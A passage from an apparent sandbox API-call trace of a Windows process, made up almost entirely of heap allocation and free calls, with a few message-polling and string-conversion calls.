Size=0x4) returned 0x9c2838 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0177.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.294] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0177.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0177.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0177.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0177.299] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.299] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0177.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0177.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0177.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0177.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0177.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.302] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 